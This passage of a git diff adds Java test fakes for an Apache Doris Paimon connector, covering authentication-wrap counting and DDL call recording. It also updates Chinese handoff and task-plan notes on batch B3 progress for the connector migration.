one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import org.apache.doris.connector.spi.ConnectorContext; + +import java.util.concurrent.Callable; + +/** + * Hand-written {@link ConnectorContext} test double (no Mockito) used to assert that the + * Paimon DDL path wraps every remote call in {@link #executeAuthenticated}. + * + *

    Read-path tests just pass a fresh instance and ignore it. DDL tests assert on + * {@link #authCount} (one wrap per DDL op) and use {@link #failAuth} to simulate an auth + * failure: when set, {@link #executeAuthenticated} throws WITHOUT invoking the task, which + * proves the seam call sits INSIDE the authenticator (if the production code called the seam + * directly, the recording fake would log the call despite the auth failure). + */ +final class RecordingConnectorContext implements ConnectorContext { + + int authCount; + boolean failAuth; + + @Override + public String getCatalogName() { + return "test"; + } + + @Override + public long getCatalogId() { + return 0; + } + + @Override + public T executeAuthenticated(Callable task) throws Exception { + authCount++; + if (failAuth) { + // Deliberately do NOT call task -> the wrapped seam call must not run. + throw new RuntimeException("auth failed"); + } + return task.call(); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java index 1eefa4e1fe7380..488a1da1a44567 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/RecordingPaimonCatalogOps.java @@ -20,20 +20,23 @@ import org.apache.paimon.catalog.Catalog; import org.apache.paimon.catalog.Database; import org.apache.paimon.catalog.Identifier; +import org.apache.paimon.partition.Partition; +import org.apache.paimon.schema.Schema; import org.apache.paimon.table.Table; import java.util.ArrayList; import java.util.List; +import java.util.Map; /** * Hand-written recording fake for {@link PaimonCatalogOps} (no Mockito), mirroring the * maxcompute connector's recording {@code McStructureHelper}. * *

    Records an ordered call log, returns configurable fixed data, and can be told to throw - * the paimon {@code DatabaseNotExistException} / {@code TableNotExistException} that the - * production code catches. Because the seam fully covers every remote call - * {@link PaimonConnectorMetadata} makes, the metadata under test is built with a {@code null} - * real Catalog — the test stays entirely offline. + * the paimon {@code DatabaseNotExistException} / {@code TableNotExistException} (and the B3 + * DDL exceptions) that the production code catches/wraps. Because the seam fully covers every + * remote call {@link PaimonConnectorMetadata} makes, the metadata under test is built with a + * {@code null} real Catalog — the test stays entirely offline. */ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { @@ -42,10 +45,31 @@ final class RecordingPaimonCatalogOps implements PaimonCatalogOps { List databases = new ArrayList<>(); List tables = new ArrayList<>(); Table table; + List partitions = new ArrayList<>(); boolean throwDatabaseNotExist; boolean throwTableNotExist; + // ---- B3 DDL capture fields (inputs the metadata layer passed to the seam) ---- + Schema lastCreatedSchema; + Identifier lastCreatedTableId; + boolean lastCreateTableIgnoreIfExists; + Identifier lastDroppedTableId; + boolean lastDropTableIgnoreIfNotExists; + String lastCreatedDb; + Map lastCreatedDbProps; + boolean lastCreateDbIgnoreIfExists; + String lastDroppedDb; + boolean lastDropCascade; + boolean lastDropDbIgnoreIfNotExists; + + // ---- B3 DDL throw flags (mirror the read-path throwDatabaseNotExist/throwTableNotExist) ---- + boolean throwTableAlreadyExist; + boolean throwTableNotExistOnDrop; + boolean throwDatabaseAlreadyExist; + boolean throwDatabaseNotEmpty; + boolean throwDatabaseNotExistOnDrop; + @Override public List listDatabases() { log.add("listDatabases"); @@ -81,6 +105,65 @@ public Table getTable(Identifier identifier) throws Catalog.TableNotExistExcepti return table; } + @Override + public List listPartitions(Identifier identifier) throws Catalog.TableNotExistException { + log.add("listPartitions:" + identifier.getFullName()); + if (throwTableNotExist) { + throw new Catalog.TableNotExistException(identifier); + } + return partitions; + } + + @Override + public void createDatabase(String name, boolean ignoreIfExists, Map properties) + throws Catalog.DatabaseAlreadyExistException { + log.add("createDatabase:" + name); + lastCreatedDb = name; + lastCreateDbIgnoreIfExists = ignoreIfExists; + lastCreatedDbProps = properties; + if (throwDatabaseAlreadyExist) { + throw new Catalog.DatabaseAlreadyExistException(name); + } + } + + @Override + public void dropDatabase(String name, boolean ignoreIfNotExists, boolean cascade) + throws Catalog.DatabaseNotExistException, Catalog.DatabaseNotEmptyException { + log.add("dropDatabase:" + name + ",cascade=" + cascade); + lastDroppedDb = name; + lastDropDbIgnoreIfNotExists = ignoreIfNotExists; + lastDropCascade = cascade; + if (throwDatabaseNotExistOnDrop) { + throw new Catalog.DatabaseNotExistException(name); + } + if (throwDatabaseNotEmpty) { + throw new Catalog.DatabaseNotEmptyException(name); + } + } + + @Override + public void createTable(Identifier identifier, Schema schema, boolean ignoreIfExists) + throws Catalog.TableAlreadyExistException, Catalog.DatabaseNotExistException { + log.add("createTable:" + identifier.getFullName()); + lastCreatedTableId = identifier; + lastCreatedSchema = schema; + lastCreateTableIgnoreIfExists = ignoreIfExists; + if (throwTableAlreadyExist) { + throw new Catalog.TableAlreadyExistException(identifier); + } + } + + @Override + public void dropTable(Identifier identifier, boolean ignoreIfNotExists) + throws Catalog.TableNotExistException { + log.add("dropTable:" + identifier.getFullName()); + lastDroppedTableId = identifier; + lastDropTableIgnoreIfNotExists = ignoreIfNotExists; + if (throwTableNotExistOnDrop || throwTableNotExist) { + throw new Catalog.TableNotExistException(identifier); + } + } + @Override public void close() { log.add("close"); diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index b7a41005e40744..843b6cb9a5c877 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,52 +5,46 @@ --- -# 🔥 2026-06-09 — P5 paimon B1 完成(flavor 装配,全 5 flavor,单 Catalog);下一步 = B2(normal-read) +# 🔥 2026-06-10 — P5 paimon B3 完成(DDL metadata,T11-T15);下一步 = B4(sys-tables E7 + MVCC E5) -> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B1**(T03 flavor 装配 + T04 属性键 + T05 validateProperties)。**用户签字 all-5-flavors now**(非分阶段)。subagent-driven(内部 2-dispatch,每 dispatch implement→spec-review→quality-review→fix-loop→re-review + final holistic review + 主线 firsthand 复跑)。 +> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B3**(DDL metadata)。subagent-driven(understand workflow → 主线 firsthand 核读 → 用户签 D7 → 3 dispatch 各 implement→spec-review→quality-review,全 mutation-verified → 3-lens final holistic review + 主线 firsthand 复跑)。**B2+B3 改动均未提交**(用户决定何时 commit;同处 dirty tree)。 -## ✅ 本 session 已完成(B1 = T03 + T04 + T05) +## ✅ 本 session 已完成(B3 = T11-T15,纯连接器侧,0 fe-core/SPI/api 改动) -- **新 `PaimonCatalogFactory`**(连接器侧,镜像 MC `MCConnectorClientFactory` 角色):纯 `validate(props)`(flavor 合法性 + 每-flavor 必需键 fail-fast)+ 纯 `buildCatalogOptions(props)`(`paimon.catalog.type`→paimon `metastore` opt[filesystem/hive/rest/jdbc] + warehouse + 每-flavor opts + `paimon.*` 透传排除 4 storage 前缀)+ 纯 `buildHadoopConfiguration`/`buildHmsHiveConf`/`buildDlfHiveConf` + `requireOssStorageForDlf`。**纯=可离线 UT**(31 个 PaimonCatalogFactoryTest,WHY+MUTATION)。 -- **`PaimonConnector`**:线程 `ConnectorContext`(之前 provider.create 丢弃了 context);`createCatalog` 全 5 flavor 活线——filesystem/jdbc=`CatalogContext.create(options, conf)`、rest=Options-only、hms/dlf=HiveConf;**全部 `context.executeAuthenticated(...)` 包裹**(authenticator seam,FE 注入 Kerberos UGI,默认 no-op);JDBC DriverShim 移植,driver_url 经 `context.getEnvironment()` 解析(替禁用的 `JdbcResource`)。 -- **`PaimonConnectorProperties`**:全 flavor key 常量(HMS/REST/JDBC/DLF,多别名 `String[]`)。**`PaimonConnectorProvider`**:`create` 传 context + override `validateProperties`→`PaimonCatalogFactory.validate`。 -- **pom**:加 `paimon-hive-connector-3.1`+`hadoop-common`+`hive-common`(compile,managed 版);**弃 hive-catalog-shade** 避 fastutil 冲突。 -- **验证(主线 firsthand)**:`Tests run: 43, Failures: 0, Errors: 0, Skipped: 1`(1 skip=live)+ BUILD SUCCESS + checkstyle 0 + import-gate 0。spec+quality 双审/dispatch + final holistic review=READY。 +- **T11**:`PaimonTypeMapping.toPaimonType(ConnectorType)` 反向(switch on `getTypeName()`,byte-parity `DorisToPaimonTypeVisitor.atomic:82-108`:char-family→`VarCharType(MAX)`、DATETIME→no-arg `TimestampType`(scale 丢)、map-key `.copy(false)`、struct id `AtomicInteger(-1)`、gap→`DorisConnectorException`保留 legacy 窄集)。 +- **T12**:新 `PaimonSchemaBuilder.build(request)`(port `PaimonMetadataOps.toPaimonSchema:231-256`:PK from `properties["primary-key"]`、identity partitionKeys、location→`CoreOptions.PATH`、strip primary-key/comment、per-column `.copy(nullable)`)。**2 故意 safer 偏差**(已 doc + 测):comment `properties["comment"]`优先否则 fallback `request.getComment()`(legacy 只读 prop,丢 COMMENT 子句);PK drop-blank。非-identity transform→throw。 +- **T13**:`createTable`(override request-overload,`PaimonSchemaBuilder` build 在 wrap **外** → schema-fail raw 不双包)+ `dropTable`(handle-based idempotent ignoreIfNotExists=true)。remote-vs-local 名 bug 在 SPI 层 **moot**(请求单名 from `db.getRemoteName()`)。 +- **T14**:`supportsCreateDatabase=true` + `createDatabase`(HMS-only-props gate,flavor 读注入 `catalogProperties` via `resolveFlavor`,gate 在 auth **前**;ignoreIfExists=false 因 FE 已 short-circuit)+ 4-arg `dropDatabase(force)`(enumerate-loop **AND** native cascade,legacy `performDropDb:147-163` belt-and-suspenders,非 MC enumerate-only;整体一个 auth scope)。 +- **T13/T14 D7=B**:seam `PaimonCatalogOps` 加 4 DDL 方法(+ `CatalogBackedPaimonCatalogOps` delegations + `RecordingPaimonCatalogOps` fake,paimon `Catalog` 签名 javap 核);**thread `ConnectorContext` 入 `PaimonConnectorMetadata`(3-arg ctor,无 2-arg;`PaimonConnector.getMetadata` 传 context)**;4 个 DDL op 各包 `context.executeAuthenticated`,**read 路径不包**(B2 现状未改)。 +- **T15**:4 新测类(`PaimonTypeMappingToPaimonTest`10 / `PaimonSchemaBuilderTest`10 / `PaimonConnectorMetadataDdlTest`9 / `PaimonConnectorMetadataDbDdlTest`11)+ `RecordingConnectorContext`(failAuth 钉 auth-wrap:seam 在 wrap 内)+ `RecordingPaimonCatalogOps` DDL 扩。no-mockito,WHY+MUTATION。 +- **验证(主线 firsthand 复跑)**:`Tests run: 96, Failures: 0, Errors: 0, Skipped: 1`(1=live)+ BUILD SUCCESS + checkstyle 0 + import-gate 0 + **无 fe-core/fe-connector-api/fe-connector-spi 改动** + 无 B7 cutover 泄漏。每 dispatch 双审 mutation-verified;3-lens final holistic(parity/adversarial/scope-build)= 全 READY。 -## 🧠 核心发现 / 纠偏(影响后续批次 + 翻闸) +## 🧠 核心发现 / 纠偏(B3 understand 纠偏 1 处 plan 前提 → D7;另证实 1 处 plan 前提为真) -1. **2 个新 blocker(非 plan 预见)已解**:① JDBC 用 `org.apache.doris.catalog.JdbcResource`(禁 import)→ 改 `ConnectorContext.getEnvironment()`(`jdbc_drivers_dir`/`doris_home`);② storage `Configuration` 由 fe-core `StorageProperties`(禁)构建 → 连接器 minimal 重建(`fs.*`/`dfs.*`/`hadoop.*` + `paimon.s3.*`→`fs.s3a.` normalize)。 -2. **reachability 真相**(firsthand):paimon-core 1.3.1 只含 filesystem/jdbc/rest catalog;hms+dlf 都 → paimon `metastore=hive`(dlf=HMS+Aliyun ProxyMetaStoreClient+DataLakeConfig)须 `paimon-hive-connector-3.1`。DLF key 全 inline 字面量(`dlf.catalog.*`,javap 证)避 Aliyun 编译依赖。 -3. **纠偏:rest 同样必需 warehouse**(recon「rest Options-only 无 warehouse」证伪)——legacy base warehouse `@ConnectorProperty` required 默认 true 且 rest 未 override。已改齐 parity。 -4. **authenticator 简化**:legacy 每-flavor 条件 `HadoopExecutionAuthenticator`;连接器统一 `executeAuthenticated` 包裹全 flavor(FE 无 Kerberos 时注入 no-op,等价且更简)。 +1. **T13 authenticator → D7=B(签字)**:plan「per-flavor authenticator」与 code 冲突——MC DDL **不**用 authenticator;legacy `PaimonMetadataOps` **每** call 包 `executionAuthenticator.execute`;**B2 read 路径不 re-wrap**(靠构建时一次 wrap);metadata 当前不收 `ConnectorContext`。用户签 **B=legacy parity**(thread context + 每 DDL op 包 wrap,read 不动)。**遗留不一致**:read 未 wrap、DDL 已 wrap——若 live-e2e 证 Kerberized **读**也需 call-time doAs,则 read 须补 wrap(B2 回改,归翻闸前 live-e2e authenticator 门)。 +2. **「PluginDrivenExternalCatalog 已 override FE 侧」证实为真**(非纠偏):FE 4 个 DDL 分发(createTable:300 / createDb:355 / dropDb:387 / dropTable:439)已通用接 SPI(`connector.getMetadata`),MC 已证端到端通。memory [[catalog-spi-cutover-fe-dispatch-gap]] 警告的 FE 分发缺口**对 paimon DDL 不适用**——真闸是 `CatalogFactory.SPI_READY_TYPES` 成员(paimon 未入 → 现走 built-in `PaimonExternalCatalog`),属 **B7/T27**,非 B3 缺口。B3 纯连接器侧。 +3. **understand workflow 韧性**:6 agent 中 2 个返回退化 stub(占位「test」值),其 scope 由其余 4 agent 全覆盖并 cross-verified——结论无损。下轮可在 prompt 里加「拒绝占位输出」。 -## ⚠️ 翻闸(B7)硬门新增(B1 落地,live-e2e 必验,pre-cutover 离线不可测) +## 🎯 下一 session = B4(sys-tables E7 + MVCC E5;gated on B2+B3 全完,现满足) -> 详见 plan-doc「风险/开放问题」R-高/R-中 翻闸门条 + 阶段日志 B1 条 + 代码内 NOTE。**用户真实 paimon 各 flavor 环境必验。** - -1. **hms/dlf Thrift metastore client 跨 classloader**:连接器**不打包** `IMetaStoreClient`/`HiveMetaStoreClient`(paimon-hive-connector 的 hive-exec/metastore=test scope);翻闸时由 FE host `hive-catalog-shade`(3.1.x) 提供。plugin child-first 下 host(3.1.x) 与 plugin bundled(hadoop 3.4.2/hive 2.3.9) 的 `Configuration`/`HiveConf` 身份隐患。**编译 ABI 已证良性**(paimon-3.1 引用的 HiveConf 子集在 2.3.9 全存在),但 live 须验真实 HMS 建 catalog 不抛 `NoClassDefFoundError`/`LinkageError`/`ClassCastException`。 -2. **jdbc driver_url FE 安全 allow-list 未接**(white-list/secure-path/jar 名校验,须经 ConnectorContext hook;paimon 未入 SPI_READY_TYPES 故未触达)。 -3. **HMS 外部 hive-site.xml 文件加载延后**(kerberos sasl.enabled/service-principal/auth_to_local 已移植;UGI doAs 经 executeAuthenticated FE 注入)。 - -## 🎯 下一 session = B2(normal-read;gated on B1 已完成) - -- **T06(BLOCKER)**:修 `PaimonScanPlanProvider:95` transient-Table reload fallback(transient null 时 `catalog.getTable(Identifier)` 重建;序列化后 NPE)。可参照 metadata 侧 `getColumnHandles` 已有 fallback。 -- **T07**:`PaimonPredicateConverter` session-TZ 化(读 `getTimeZone()` 惰性解析+降级,替 `:284` 固定 UTC);[[catalog-spi-connector-session-tz-gotcha]]。 -- **T08**:`listPartitionNames/listPartitions/listPartitionValues`(填 `ConnectorPartitionInfo` 含 `lastModifiedMillis=Partition.lastFileCreationTime()`)+ `getProperties`(现 stub `:154`)。 -- **T09**:override 6-arg `planScan(...requiredPartitions)` 让引擎分区裁剪生效(`PluginDrivenScanNode:474`,现只 override 4-arg),OR 文档化纯谓词裁剪 + 测。 -- **T10**:连接器内 cache 已解析 Table+schema(替 `PaimonExternalMetaCache`);核 REFRESH CATALOG/TABLE seam。 -- 批次依赖图 / 翻闸前置硬门见 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) §批次依赖。**B6**(procedure doc no-op,独立)可随时穿插。 +- **T16(greenfield SPI,签名须慎)**:`ConnectorMetadata.listSupportedSysTables`(default emptySet) + `getSysTableHandle`(default empty);保 MC/jdbc/es/trino 不受影响。**被未来 iceberg/hudi 复用,设计错须二次迁移**。 +- **T17**:paimon 实现 E7(名取 `SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 走 4-arg `Identifier(db,tbl,"main",sysName)`;handle 带 sysName+forceJni;reload fallback;branch="main" 限制保留+doc)。 +- **T18(greenfield fe-core)**:通用 `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE,**勿报 PAIMON_EXTERNAL_TABLE**) + `NativeSysTable` factory;override `getSupportedSysTables/findSysTable` 委托连接器。 +- **T19**:`PaimonScanPlanProvider` 加 forceJni 分支(binlog/audit_log + 非 DataTable sys 全走 JNI——native = 行错静默)+ 通用节点 fail-loud 拒 sys 表 scan-params/time-travel;核 BE sys-table `TTableDescriptor`(HIVE_TABLE?)。 +- **T20(首个 E5 消费者)**:`beginQuerySnapshot/getSnapshotAt/getSnapshotById`(返 `ConnectorMvccSnapshot(snapshotId)`,空表 -1)+声明 `SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`;sys 表不得透出 time-travel。 +- 批次依赖见 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) §批次依赖。**B5**(MTMV 桥)gated on B4 全完。**B6**(procedure doc no-op,独立)可随时穿插。 ## ⚙️ 操作须知(复用) - maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`(**须 -am**,裸 -pl 会因 `${revision}` 兄弟解析虚假失败);改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 -- 连接器禁 import fe-core/fe-common(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`;import-gate `bash tools/check-connector-imports.sh`)。连接器测试无 mockito(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]]);checkstyle 含 test 源、绑 validate(`mvn test` 即跑)。 +- 连接器禁 import fe-core/fe-common(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`;import-gate `bash tools/check-connector-imports.sh`)。`org.apache.paimon.*` 全可(含 `catalog.Catalog` DDL、`schema.Schema`、`CoreOptions`、`types.*`、`utils.DateTimeUtils`)。`org.apache.doris.connector.{api,spi}.*` 可(`ConnectorContext.executeAuthenticated(Callable) throws Exception` 默认 no-op)。连接器测试无 mockito(`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`FakePaimonTable` 手写 fake;测须带 WHY+MUTATION);checkstyle 含 test 源、绑 validate。 +- **subagent-driven 节奏(B3 用)**:understand workflow(read-only fan-out 验 plan 前提)→ 主线 firsthand 核读 + 用户签决策 → 每 dispatch 用 Agent 工具(非 worktree 隔离,共享 dirty tree,顺序 build-on-previous)implement→spec-review→quality-review→fix-loop → final holistic Workflow(多 lens 并行)+ 主线 firsthand 复跑。**所有 subagent prompt 里禁 `git checkout/restore/stash/reset`**(会抹未提交工作)+ 嘱「不要 commit」(用户控)。 - 翻闸(B7)GSON **7 注册原子齐迁**(5 catalog + db + table,[[catalog-spi-gson-migrate-all-three]] / [[catalog-spi-cutover-fe-dispatch-gap]]);删 legacy(B8)后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 -- 分支 `catalog-spi-07-paimon`。**B1 改动未提交**(用户决定何时 commit);连接器新文件 `PaimonCatalogFactory.java`/`PaimonCatalogFactoryTest.java` 未跟踪。**未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`(用户本地集群配置)。 +- **未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`,**含明文 ak/sk/Kerberos 凭据**)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`(用户本地集群配置)。B3 未碰它们。 ## 🧠 给下一个 agent 的 meta -- **D-037/D-038 已签字 + all-5-flavors 已签**,B0+B1 已落 —— 按设计 doc B2→B9 续。 -- **live e2e(真实 paimon 各 flavor 环境)= 翻闸真正完成门**(CI 跳),翻闸前用户验;B1 新增 3 个 live-e2e 硬门(见上 ⚠️);parity doc §4 有 run plan。 -- **MTMV 单-pin 不变式**(B5)是最高 correctness 风险;`lastFileCreationTime()` 跨 flavor 可靠性须 live 验。 -- auto-memory:[[catalog-spi-p5-paimon-design]](设计决策)、[[catalog-spi-p5-b1-design]](B1 flavor 装配定夺 + 2 blocker + 翻闸门)。 +- **D1/D2/D4/D5/D6/D7 已签字**,B0+B1+B2+B3 已落 —— 按设计 doc B4→B9 续。 +- **live e2e(真实 paimon 各 flavor 环境)= 翻闸真正完成门**(CI 跳),翻闸前用户验;现累计 live-e2e 硬门:hms/dlf metastore client 跨 loader、jdbc driver allow-list、hive-site.xml、live createCatalog(B1);DDL `executeAuthenticated`(D7=B) 在 Kerberized HMS/HDFS 正确性(B3);`lastFileCreationTime()` 跨 flavor + DATE 渲染 raw-vs-rendered(B2)。 +- **B5 reconcile 项(仍 dormant)**:`partition_columns` schema key 未翻(FE 现把 paimon 当非分区);`listPartitionValues` 返 RAW spec、legacy TVF 返 RENDERED;MTMV 单-pin 不变式(最高 correctness 风险)。 +- auto-memory:[[catalog-spi-p5-paimon-design]](设计决策)、[[catalog-spi-p5-b1-design]](B1 flavor 装配)、[[catalog-spi-p5-b2-design]](B2 3 处 plan 纠偏)、[[catalog-spi-p5-b3-design]](B3 DDL:D7=B authenticator + FE-dispatch 缺口证伪 + 2 safer 偏差)、[[catalog-spi-connector-session-tz-gotcha]](含 paimon 例外)。 diff --git a/plan-doc/tasks/P5-paimon-migration.md b/plan-doc/tasks/P5-paimon-migration.md index 4fcd5e6a54364c..d34696a2b30755 100644 --- a/plan-doc/tasks/P5-paimon-migration.md +++ b/plan-doc/tasks/P5-paimon-migration.md @@ -7,7 +7,7 @@ ## 元信息 -- **状态**:🟢 进行中(**B1 已完成 2026-06-09**:T03/T04/T05 flavor 装配,用户签 all-5-flavors,连接器 43/0/0/1 绿、checkstyle 0、import-gate 0、final holistic review=READY;下一批 = B2 normal-read。B0 见阶段日志) +- **状态**:🟢 进行中(**B3 已完成 2026-06-10**:T11-T15 DDL metadata,连接器 96/0/0/1 绿、checkstyle 0、import-gate 0、**无 fe-core/SPI/api 改动**、3-lens final holistic review=全 READY;D7 签字(authenticator=legacy-parity wrap each DDL call)。下一批 = B4 sys-tables E7 + MVCC E5(gated on B2+B3 全完,现满足)。B0/B1/B2 见阶段日志) - **启动日期**:2026-06-09(recon+设计) - **目标完成**:TBD(估时 ~5-6 周,含 D2-A 的 MTMV/MVCC 桥) - **阻塞**:无(D1=A / D2=A 已签字);分批实现按 B0→B9 启动 @@ -88,16 +88,16 @@ Master plan [§3.6](../00-connector-migration-master-plan.md);策略 = full ad | P5-T03 | `PaimonConnector.createCatalog` flavor 装配(switch on `paimon.catalog.type`→paimon `metastore` opt:warehouse/options/重建 Hadoop·HiveConf/**authenticator=`ConnectorContext.executeAuthenticated`**;全 5 flavor)| B1 | C | ✅ | 新 `PaimonCatalogFactory`(纯 buildCatalogOptions/buildHadoopConfiguration/buildHmsHiveConf/buildDlfHiveConf/requireOssStorageForDlf);线程 ConnectorContext;DriverShim 经 getEnvironment 替 JdbcResource;hms/dlf live-e2e 门见下 | | P5-T04 | 拷 HMS/REST/DLF/JDBC + credential/storage 属性键入 `PaimonConnectorProperties`(禁 import fe-core)| B1 | C | ✅ | 全 flavor key 常量,多别名 `String[]` | | P5-T05 | 扩 `PaimonConnectorProvider.validateProperties`(flavor 合法性 + 每-flavor 必需属性,`IllegalArgumentException` fail-fast)| B1 | C | ✅ | → `PaimonCatalogFactory.validate`;rest 同样必需 warehouse(legacy parity,纠偏 recon)| -| P5-T06 | 修 `PaimonTableHandle` transient-Table **reload fallback**(transient null 时由 `catalog.getTable(Identifier)` 重建);`PaimonScanPlanProvider:95` 调用 | B2 | C | ⏳ | **BLOCKER** | -| P5-T07 | `PaimonPredicateConverter` session-TZ 化(读 `getTimeZone()` 惰性解析+降级,替 `:284` 固定 UTC);不可转降级空;`supportsCastPredicatePushdown()=false`;保 FLOAT/CHAR 不下推 | B2 | C | ⏳ | [[catalog-spi-connector-session-tz-gotcha]] | -| P5-T08 | 实现 `PaimonConnectorMetadata.listPartitionNames/listPartitions/listPartitionValues`(填 `ConnectorPartitionInfo` 含 lastModifiedMillis=`Partition.lastFileCreationTime()`,partitionName=最终 legacy-name 解析后显示名)+ `getProperties`(现 stub `:154`)| B2 | C | ⏳ | 喂 `getNameToPartitionItems:246` 裁剪 + MTMV | -| P5-T09 | override 6-arg `planScan(...requiredPartitions)` 让引擎分区裁剪生效(`PluginDrivenScanNode:474`),OR 文档化纯谓词裁剪 + 测 | B2 | C | ⏳ | 现只 override 4-arg | -| P5-T10 | 连接器内 cache 已解析 Table+schema(替 `PaimonExternalMetaCache`);核 REFRESH CATALOG 经 `PluginDrivenExternalCatalog` 销毁 connector(`:530-534`)是否够,否则提 `invalidateTable` SPI;核 REFRESH TABLE seam | B2 | C | ⏳ | 见开放问题 | -| P5-T11 | `PaimonTypeMapping` 加 Doris→paimon 方向(吃 ConnectorType;保留 legacy gap:无 TINYINT/SMALLINT/LARGEINT/TIME、char→VarChar(MAX)、DATETIME→plain Timestamp)| B3 | C | ⏳ | `DorisToPaimonTypeVisitor:81-108` | -| P5-T12 | `PaimonSchemaBuilder`(ConnectorCreateTableRequest→paimon Schema:primary-key/comment/location→CoreOptions.PATH、partitionKeys from IDENTITY spec;bucket 经 options passthrough)| B3 | C | ⏳ | DISTRIBUTE BY 禁(`CreateTableInfo:793`) | -| P5-T13 | 实现 `createTable`/`dropTable`(远端 + per-flavor authenticator;保留 latent remote-vs-local 名 bug 不修)| B3 | C | ⏳ | `PluginDrivenExternalCatalog` 已 override FE 侧 | -| P5-T14 | 实现 `supportsCreateDatabase=true`+`createDatabase`(HMS-only-props gate 读 `session.getCatalogProperties()`)+`dropDatabase(force)` enumerate-loop | B3 | C | ⏳ | MC parity `:466/478` | -| P5-T15 | DDL 离线 UT(createDb gate / dropDb force 级联 / createTable schema / IF NOT EXISTS / type gap)| B3 | T | ⏳ | | +| P5-T06 | 修 transient-Table **reload fallback**:`PaimonScanPlanProvider` 加 `catalogOps` 注入 + 包私 `resolveTable`(transient null→`catalogOps.getTable(Identifier)` 重建),planScan + getScanNodeProperties 两 site 都护 | B2 | C | ✅ | **BLOCKER**;镜像 `getColumnHandles:160-171` fallback;2 直测 `resolveTable`(FakePaimonTable.newReadBuilder 抛故不能端到端跑 planScan)| +| P5-T07 | `PaimonPredicateConverter` **parity-correct TZ**(NTZ 保 UTC、LTZ 不下推、不可转降级空、保 FLOAT/CHAR 不下推)+ `PaimonConnectorMetadata.supportsCastPredicatePushdown()=false` | B2 | C | ✅ | **D4:不 session-TZ**(纠偏 [[catalog-spi-connector-session-tz-gotcha]] 对 paimon 的误用;legacy 用固定 GMT/UTC)| +| P5-T08 | 实现 `PaimonConnectorMetadata.listPartitionNames/listPartitions/listPartitionValues`(填 `ConnectorPartitionInfo` 含 lastModifiedMillis=`Partition.lastFileCreationTime()`、rowCount/sizeBytes、raw spec partitionValues,partitionName=legacy-name 解析显示名经 paimon `DateTimeUtils.formatDate`)+ 扩 seam `listPartitions(Identifier)`(+ `RecordingPaimonCatalogOps`/`FakePaimonTable.options()` 测扩)| B2 | C | ✅ | **D5:B2 实现连接器 SPI 但不接 FE**(`partition_columns` key 翻 + FE 消费 + MTMV 喂 = B5 前置);**`getProperties` 不实现**(firsthand:fe-core 零消费方 + MC 不 override + 凭据泄漏风险 → 留 emptyMap stub,纠偏 plan「retain props map」)| +| P5-T09 | **文档化纯谓词裁剪**(不 override 6-arg `planScan`;paimon `withFilter`+SDK 内部裁分区/文件,scan-correct)+ Javadoc note(镜像 MC「intentionally NOT overridden」)| B2 | C | ✅ | **D5:不 override 6-arg**;EXPLAIN partition=N/M 显示损失=已知 cosmetic gap | +| P5-T10 | 连接器内 cache(替 `PaimonExternalMetaCache`)**延后**;REFRESH seam 已核 | B2 | D | ✅ | **D6:B2 延后**(cache+invalidation SPI=`default-no-op invalidateTable`+`onRefreshCache` clear+RefreshManager wiring = B8/翻闸前置;REFRESH CATALOG/TABLE 均不达 connector 已证伪 plan 前提)| +| P5-T11 | `PaimonTypeMapping` 加 Doris→paimon 方向(吃 ConnectorType;保留 legacy gap:无 TINYINT/SMALLINT/LARGEINT/TIME、char→VarChar(MAX)、DATETIME→plain Timestamp)| B3 | C | ✅ | `toPaimonType` switch on `getTypeName()`,byte-parity `DorisToPaimonTypeVisitor.atomic:82-108`(map-key `.copy(false)`、struct id `AtomicInteger(-1)`、gap→`DorisConnectorException`);nested-nullability SPI 结构性丢失(`ConnectorType` 无 per-child flag,上游已丢,moot) | +| P5-T12 | `PaimonSchemaBuilder`(ConnectorCreateTableRequest→paimon Schema:primary-key/comment/location→CoreOptions.PATH、partitionKeys from IDENTITY spec;bucket 经 options passthrough)| B3 | C | ✅ | port `toPaimonSchema:231-256`;2 故意 safer 偏差:comment `properties["comment"]`优先否则 fallback `request.getComment()`(legacy 只读 prop 丢 COMMENT 子句)、PK drop-blank(legacy 不 drop);非-identity transform→throw | +| P5-T13 | 